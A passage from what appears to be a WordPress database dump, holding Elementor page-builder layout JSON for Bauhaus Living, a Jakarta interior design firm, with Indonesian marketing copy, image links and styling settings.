flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4295,4931,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4296,4931,'_elementor_pro_version','3.8.1'),(4297,4932,'_wp_page_template','elementor_header_footer'),(4298,4932,'_elementor_edit_mode','builder'),(4299,4932,'_elementor_template_type','wp-page'),(4300,4932,'_elementor_version','3.8.1'),(4301,4932,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"b